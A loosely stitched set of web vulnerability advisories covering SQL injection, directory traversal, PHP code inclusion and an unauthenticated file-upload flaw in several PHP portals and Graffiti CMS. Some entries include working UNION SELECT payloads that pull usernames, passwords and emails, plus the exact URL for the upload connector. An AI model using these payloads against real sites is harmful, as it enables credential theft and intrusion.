An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. This will allow the attacker to view the contents of any file on the server, including sensitive files such as configuration files, source code, etc.
This is a Blind SQL Injection bug, but the database does not contain particularly sensitive information such as usernames and/or passwords. However, this injection can be used to write arbitrary files into the database.
An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g., “../”) to the vulnerable application. This can allow the attacker to access arbitrary files and directories stored on the web server.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'root_path' parameter to '/admin/admin_news_bot.php' script. A remote attacker can send a specially crafted HTTP request with malicious code in the 'root_path' parameter and execute arbitrary PHP code on the vulnerable system.
A SQL injection vulnerability exists in the profile.php page of the Adult Portal escort listing website (www.tourismscripts.com). An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the profile.php page with the user_id parameter set to -1'+UNION+SELECT+0,CONCAT_WS(0x3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+member/* or www.TraGeT.CoM/profile.php?user_id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'sitetext_id' parameter to the '/aboutus.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application database, gain access to sensitive data, modify data, etc.
The Accommodation Hotel Booking Portal is vulnerable to a remote SQL injection vulnerability. Attackers can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter 'hotel_id' in the URL. For example, www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL code in the 'cat_id' parameter of the 'download.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to disclose sensitive information from the database, modify data, compromise the system, etc.
A remote SQL injection vulnerability exists in MYRE Holiday Rental Manager. An attacker can send a specially crafted HTTP request to review.php with the action parameter set to show_review and link_id set to 1+UNION+SELECT+0,0,concat_ws(0x3a3a,member_name,member_password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+members-- or 1+UNION+SELECT+0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+multiavailability_calendars--, to view sensitive information from the database.
Graffiti CMS includes a file manager component that allows unauthenticated users to upload files (including ASP.NET pages, which allow code execution). All versions are affected by this vulnerability. To exploit this issue, it suffices to access the following URL: http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx